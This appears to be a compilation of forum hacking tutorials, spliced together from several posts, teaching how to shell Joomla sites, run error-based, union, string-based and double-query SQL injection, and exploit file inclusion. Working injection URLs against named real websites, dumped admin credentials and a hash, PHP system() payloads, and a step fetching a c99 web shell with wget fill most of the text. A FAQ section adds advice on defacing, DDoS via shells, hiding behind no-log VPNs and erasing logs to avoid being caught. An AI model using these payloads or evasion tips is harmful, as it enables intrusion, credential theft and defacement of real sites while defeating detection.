For this week's tutorial, we're gonna use two method of shelling Joomla sites in case one method doesn't work.
So let's get started.
First Method: Shelling Joomla sites using Templates.
Step1: Login into the Joomla administrator's admin panel.
Alright, once we're logged in, navigate to "Extensions" and click "Template manager"
Once you're there, you'll see a bunch of themes you can choose.
Choose any theme you would like to edit. I suggest you leave the default theme untouched.
Once you've chosen a theme, select it, and Click on Edit
Once you have clicked Edit, Click on "Edit HTML"
You'll see the source code and the path of the Template once you've clicked "Edit HTML".
Make sure to copy the "Path".
Hey guys,
It's Zer0 and I'll be explaining another type of Error Based SQL injection.
It's definitely another type but in this case, I call it Union-Error
based, since it involves Union Select in the queries we're about to use.
So let's get started
In this example we're gonna be using this site (which was asked by a member in -Downfall's thread):
Code:
http://www.seenpm.org/
The vulnerable link would be:
Code:
http://www.seenpm.org/new/index.php?id=151'
Before I go further, let me explain
some of the SQL functions we're gonna be using in this tutorial, so that
you'll have an idea how the query works. Please read carefully
Code:
count(*) = Returns the total number of records in the table/view
group by = Groups the result of the query set by one or more columns
concat = shows the results in one column
information_schema = The default database
table_schema = Specified database
table_name = The current table name
limit = Limits the amount of content to be displayed
mid() = Used to extract characters from a text field
See more of the functions here: http://www.w3schools.com/sql/sql_functions.asp NOTE: Make sure to organize the query if you're just gonna copy and paste!
There could be some spaces in between Getting the version of their database (2 main ways to do it):
First way:
Query:
Code:
+AND(SELECT COUNT(*) FROM
(SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT
version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+AND(SELECT
COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by
CONCAT((SELECT version() FROM information_schema.tables LIMIT
0,1),FLOOR(RAND(0)*2)))
Results:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Second way:
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_
schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+f
rom+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Now that we've got the version, let's extract the database:
Query used:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+f
rom+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)--
x
URL will look like this:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(sche
ma_name),0x7e)+from+information_schema.schemata
limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'
Note: Notice the limit 0,1),1,150)
This is the part where I raised the ascii from 25 to 150, just in case there would have been more database
I'll explain more about the mid() function in the next step
We have the database and version so far Now for the tables in their current database
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+fr
om+information_schema.tables where table_schema=database()
limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl
e_name),0x7e)+from+information_schema.tables where
table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
'links,members,menu,menu_s1' for key 'group_key'
Now read this carefully, notice how the tables aren't completely shown.
Only about half of em are shown. This is because of the mid() function we're using.
Leave the limit 0,1 function and don't touch it
What you need to alter now is the integers of the mid() function
i.e
(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_sche
ma.tables where table_schema=database() limit+0,1),1,25)
Yes, that's right. Notice 1,25
25 can also be altered, however it's a moderate value, so leave it like that
Now, the number "1" shows the tables as soon as it's being altered.
Incrementing is what's being needed here
Lets just say, 15,25
It'll display the rest of the other tables
I've done a bit of a reckon on the site and found out that the 'users' table is located at 58,25
So the query with the URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl
e_name),0x7e)+from+information_schema.tables where
table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'
Now for the columns in the specified table i.e users
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+f
rom+information_schema.columns where table_name=0xHex_Table
limit+0,1),1,25),floor(rand(0)*2)))a)-- x
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(colu
mn_name),0x7e)+from+information_schema.columns where
table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Now notice the mid() function
I've incremented from 1,25 to 4,25
Now to extract the data from the desired columns
Columns we have so far: "username", "password"
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo
rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user
name,0x3a,password),0x7e)+from+users
limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'
Notice how I didn't increment the mid() function
This because the content is completely shown Note: You can know that the data is completely shown when there is a ~ sign or signs
Introductions -Hello guys, I'm ZeroFreak and today I'll be posting a couple of questions related to web hacking. -In the past few days, I've seen a lot of people having troubles and get stuck at a certain point while they hack. -Well, most of these "questions" will be answered and hopefully you'll find this thread useful
I'll be grouping the types of questions to make it easier for you guys to understand what you'll be reading Part 1:General Web Hacking FAQ
Question:What is a shell when it comes to web hacking? Answer: Well, basically a shell is a type of .php file needed to be uploaded on a hacked website or a host in order to make it work.
The way is works is not that complex if you wonder. With a shell
uploaded to your hacked website or host, you can alter almost anything
using it.
While you're using a shell, you will be able to:
Delete Website Directories and upload your deface page
Can be used to DDoS another website (depends on what type of shell you're using
Having a shell with many functions, you can also crack MD5 Hash,
modify another php file, mass mail someone, email bomb an email!
An example of a shell I use is: http://sourceforge.net/projects/ani-shell/ Question:What does defacing mean and what's a deface page Answer:Defacing,
in most certain cases, means that you wanna upload a specific file of
yours,mostly a message to prove the administrator that you hacked the
website.
If you think about it, it's relatively similar to a deface page.
A deface page, while hacking a website, is simply a message to convey to
the owner of the website that you've owned their security.
Most people do this for fun, fame, or other stuff that can satisfy your hacking skills.
If you're a beginner in web hacking, defacing a site will be considered as a big success for you just like me :) Question:A common difference between a shelled website and a defaced website?
Answer:Simply answering, a shelled website can be used as
hosting for illegal operations, can be used for DDoSing and other
functions a shell can perform
while a defaced website is simply a type of message, mostly threatening
and fun which conveys the owner of the website that their security is
low and that you owned them Question:My IP was logged while I was hacking, what should I do now?! Answer:Well, first of all, don't ever freak the hell out or piss on your pants! Calm down a bit and get your head straight.
Now to the point, if your IP has ever been logged, their is a huge
chance that you won't get caught. However don't be too happy about it.
Try WHOISing the website and see if this website is an important source
to the owner. If it is, you might wanna leave the website forever. What I
mean is that, you can just leave the site alone so that the owner won't
get too suspicious of what's happening.
Now for the most important part, next time use as VPN that never saves logs of your activity on the internet.
Examples of VPN:
1. nVPN (paid)
2. ProXPN (free)
You can also use proxy to keep yourself anonymous.
An advice from me and all other web hackers out there, no matter what
you hack whether it's a bullshit website or a strict government website,
always stay behind a VPN or Proxy and stay anonymous! Question:What is a hash and what can I do with it? Answer:To
get to the point, a hash is basically an encryption. To be specific, a
special encryption which requires hash cracking knowledge in order to
reveal the plain text
Unlike other encryption, a hash can't be decrypted. In other words, to
successfully crack a hash, you either might need to use a hash cracking
website or an external hash cracking program with an enormous word list.
An example of a website for cracking hashes: http://www.md5decrypter.co.uk/
Program for cracking:
HashCat
Now there are different types of hashes out there and you can determine
what kind of hash it is by studying the number of characters and the
types of characters in the code.
To know most of the types of hashes, visit this thread (Credits to Haxor!:) ) http://www.hackforums.net/showthread.php?tid=1393830
Other types of encryption can be decrypted using "http://www.crypo.com" Question:What is rooting a.k.a rooting rooting a server? Answer:Rooting a server in simple words means that you're having a complete remote access to a server (computer).
Rooting works on the basis of exploits. Most websites are running
through Linux servers. Now what will you gain when you root a server?
Easier said than done, you will gain remote control of the websites associated and run by that server.
It's like hacking more than 1 website at a time.
Rooting can be done with Linux and Windows and is really a hard method of web hacking when you're a newb to it. You can search millions of tutorials out there about rooting, but you might wanna start from the basics first
Question:Is there any tool that can help me ease my web hacking activity while I hack websites? Answer:First
of all, never use tools that will do the job for you i.e hack
everything for you! You don't wanna get your ass stuck while you watch a
program hack websites for you and you don't learn anything
Now, there are many useful tools out there that can help you speed up
your activity when you start hacking websites. These tools are mostly
add-on installed in a browser called Firefox (which is really a good
famous browser for hacking)
You can use some of the following:
1. HackBar add-on for Firefox:
Has a built in automatic column-number posting when you use UNION SELECT in SQL injection
Tools you need when you XSS
Built-in Text to Hex and Hext to Text
A big space for customizing your queries
2. Cookies Manager:
A very efficient tool for adding/deleting/modifying cookies
Organized layout and a friendly GUI
3. Live HTTP Headers:
Manage all the activities your browser performs i.e record the activities your browser is performing live
A very useful tool for uploading Shells on a hacked site (Used for renaming your shell.php.jpg to shell.php
Replay the activity on your browser while you alter your cookies to make changes
4. Tamper Data:
Mostly used in LFI (Local File Inclusion)
Instantly records the connections being made in your browser from the websites opened
Question:I'm very new to Web Hacking, I'm confused, where can I start? Answer: You can start from the very basics to the advanced, but never be in a hurry when you're just starting.
Here's what you can study first:
1. HTML coding
2. PHP
3. Javascript
4. Cookies
Don't work hard on mastering all of them though, just learn the basics and try to get the hang of it.
Once you've got an idea about those four, methods of web hacking are what you're searching for now.
Many methods can be learned and used and some of them are listed below from the easiest to an intermediate level.
1. SQL injection
2. XSS
3. LFI/RFI
I recommend you to start from the basics of SQL injection. Then you can
progress to further advanced methods of web hacking (More about those
methods below) Question:What are the types of web hacking methods? Answer: Some of the types are explained below
1. SQL injection: Queries entered in order to extract information from the database of the website
Error Based SQL injection
Union Based SQL injection
Time Based SQL injection
Blind SQL injection
String Based SQL injection
There's also something called WAF Bypassing where you bypass the
firewalls installed on the website. This can lead to combinations of SQL
injection if you think about it. Examples are like
String Based WAF bypassing SQL injection
String-Error Based WAF Bypassing SQL injection
WAF Bypassing Double Query SQL injection
2. XSS (Cross Site Scripting): Execute scripts to perform functions required to hack a website
Persistent - Can be used for cookie stealing
Non-Persistent- Can be used as an HTML injection, commonly used for website vulnerabity proofs
3. LFI (Local File Inclusion): Directory exploits used to upload files into the website(example: shells)
/proc/self
Log Poisoning
Malicious Image Upload
This is all what I can cover for now. But I'll be making tutorials on web hacking soon
Question:What should we do before we start to attempt web hacking? Answer: You might need to do the following when you start hacking websites.
1. Proxy/ VPN (Virtual Private Network)
Always stay behind a proxy or a VPN no matter how useless or precious the site you're attempting to hacking could be.
Proxies can be obtained from here
Note: When using a VPN, always use one that doesn't store logs and it's really a serious matter.
Hack from another Wireless network if possible
2. Expose prevention
Never attempt to share your web hacking activity anywhere or anyone
unless you trust that person so that you both can discuss and learn
together.
Some stranger might report you or blackmail you and that would really suck Question:What should I do after I'm done with hacking the website? Answer: You don't wanna get caught or reported or trace. Here are some tips.
1. Logs in the admin panel's website
After you're done with everything i.e defacing/shelling, make sure to
erase the logs created in the panel. Their is a possibility your IP
could be stored in one of their directories
2. Erase your tracks
Make sure to delete everything done on your browser i.e cookies, logs, logins etc
You can do this using CCleaner
3. Pride of success
Don't be too proud sharing what you have just done, some people are really not trust-worthy and could open up a report anytime.
Be happy of what you've done and share to ones you have trust on.
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
Click this bar to view the original image of 651x389px.
Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"
I'll show you how to exploit via php://input using the "Hackbar"
So lets check what we're supposed to use in the Hackbar
Click this bar to view the original image of 686x190px.
Now let's try putting this method in action.
Look at the picture carefully.
Click this bar to view the original image of 800x325px.
URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
<? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now shall we.
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
Alright guys, go scroll up my list and see if you can XSS those sites.
I've collected them so that people can be eager to train more and understand the concept of XSS
Don't be bothered reporting anything, cause I've reported all of those sites and I didn't get a single response.
Alright, since my previous tutorials haven't had enough responses as I
expected due to people who aren't fond of reading big tutorials, I've
decided I won't make this tutorial big. As a matter of fact, I'll just
make you understand the concepts behind String Based SQL injection. I
KNOW there are a lot of tutorials that would be the same as this one,
but I guarantee that if you read this, you won't have any doubts on
String Based.
What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens
when the site is vulnerable to SQL injection but doesn't show us the
results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+
Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we String-Union Based SQL injection 1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process
2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from
information_schema.schemata--+
Results will display the databases on their website Note: If
you don't know anything about UNION Based SQL injection, I suggest you
read one of my tutorials to progress further in this step
3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from
information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"
4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from
information_schema.columns where table_name=0x61646d696e--+
For this example, we'll use "username" and "password" as our column names
5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
Results will display the data given by the columns you have chosen
This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based This will be considered as a
mini tutorial for String Based SQL injection. I just hope people are
gonna understand this as much as they're on their journey through SQL
injection
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi End of Chapter 5 Upcoming Chapter:Blind Based SQL Injection Detailed
Contact me via PM
or
Email: zerofreak@live.com
Have a great day
Alright I'll make this tutorial as short as possible so that you can understand faster. Understanding Error Based/Double Query
How does Error Base and Double Query work
Error Based:
Code:
A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information
Double Query:
Code:
Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it
I'll explain further in this tutorial
Anyways, focus on this part of this tutorial Error Based IS Double Query Error Based = Double Query (Error based 2x) How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking; the type of injection to use in different situations.
You can use Error Based/ Double Query Injections in the following errors you get
Code:
a. The Used Select Statements Have Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c.Error #1604
Now take note of those errors. You'll be needing it Lets start with Error Based SQL injection
Alright for this lesson, we'll use this site as an example: http://www.aliqbalschools.org
First approach is knowing the version of the database
To do that we enter this query after the end of the URL
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
So the site will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
Results:
Now that we know the version of the database which is 5, lets move to the next step Second step: Getting the database name
To get the database, we enter this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1
Now our website address will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Database is : iqbal_iqbal
Second step is done where we extract the database names we need.
MAKE sure you write the database name on a paper or notepad
We'll need it later Third Step: Getting the TABLE NAMES
Table names is what we need now
Here's the query we can use:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Don't also forget the LIMIT function we used here to get table names one by one
Alright our web address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now here's the important part:
When you search for tables keep incrementing the limit until you find the valuable table name
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from Here's the formula: LIMIT N,1 where N is a random integer
Valuable Tables can be:
Code:
Users
Admin
user
administrator
tbladmin
tblusers
settings
In this case, we have the table "settings"
So now we know our table, lets move on to the next step Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
So here's how a column query extraction will look like:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX
You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look like along with the query
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Code:
Duplicate entry 'Id~1' for key 'group_key
Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Column name= passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Again, don't forget to see the LIMIT Function
Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password Fifth Step: Extracting the data from Columns
Alright this part is probably the best in SQL injecting site.
Time to get the info from the columns we have
To do that, use this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now before you proceed, watch and focus on the code and study what happens.
Here we have 4 variables: 1. COLUMN_NAME: where you insert the column name you want to extract information from 2.Databasename: where you insert the current database name of the website so that you'll be extract info from it 3. TABLENAME: where you insert the table name of the column names you extracted from 4. LIMIT N,1: LIMIT Function and N where N is a random integer
Now lets do some replacing, FOCUS
Code:
COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"
After you're done with altering the code to your needs of extracting information, time to execute it
Here's what the code will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Code:
Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key
SUCCESS, you injected the site with error based now you have the login info Username: admin Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash
Now Lets Start with DOUBLE Query SQL Injection
So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query
First off, the definition so that you can understand:
Code:
Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.
Differences: Error Based Query for Database Extraction:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Double Query for Database Extraction:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Now you get the idea, lets cut to the chase and go on
We'll be using the same site as above Step1: Getting the database version
Alright same as Error Based, here's the Double query:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
So our Address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
NOTE(IMPORTANT):Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.
Results after query execution:
Code:
Duplicate entry '~'5.1.56-log'~1' for key 'group_key
Database version is 5
You can test on the site now if you want so that you won't get confused Step2: Getting the Database
Now we've got the version, lets execute a double query on extracting the database
Query for Database extraction:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the LIMIT Function again and make sure you don't make mistakes in that
It shows that Limit N,1 where N is a random integer. Example: Limit 0,1
Here's what our address will then look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Once more, don't forget about the LIMIT Function
So here's the results:
Code:
iqbal_iqbal
Now that's their database.
Note it down on a notepad or a paper Step3: Getting the Table Names
As I've explained above, we'll be also using the LIMIT Function in this query.
Just a quick look, the query will look like this:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Alright you need to focus on the code and see the changes.
There are two variables here: 1. Hex_code_databasename 2. LIMIT Function
Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
Now that you've the database into hex, lets see what our address will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
LIMIT 19,1 brings us the valuable table which is "settings"
Review the code and study it Step4: Getting Column names from specific Tables and Database
Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction
Here's what the query will look like:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now here we have 3 variables: 1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal) 2. Hex code of tablename: Hex the table name which is "settings" 3. LIMIT Function
Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.
Here's what the address is gonna look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the hexed variables and the LIMIT Function
Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"
Review what we have just done for less confusion Step5: Getting the Data from the Columns with the help of Table name and Database name
Alright now that we know what we need to extract, lets get our goods
As far as what we're injected in the site, this is our information: database name: iqbal_iqbal table name: settings column names: userName, passWord
Here's what the query will look like first (for extracting data):
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Variables:
table_name.column_name: Input the table name and column name you want to extract information from
database_name.table_name: Input the database name and table name you want to extract information from
LIMIT Function: Increment until you find the data you need
So here's what our address is gonna look like when we extract details from userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Code:
admim
Query for extracting details from passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.
Just so that everything can be as cleared as possible, watch and learn from the video I made for you guys below:
Thank you guys for reading my tutorial and watching my video
Hope it helped you guys understand the concept of Error Based/Double Query SQL injection End of Chapter 4 Upcoming Chapter: Detailed String Based SQL injection
Contact Me: zerofreak@live.com
Stay tuned on Zer0 MegaProjectSQLi for more tutorials
Have a great day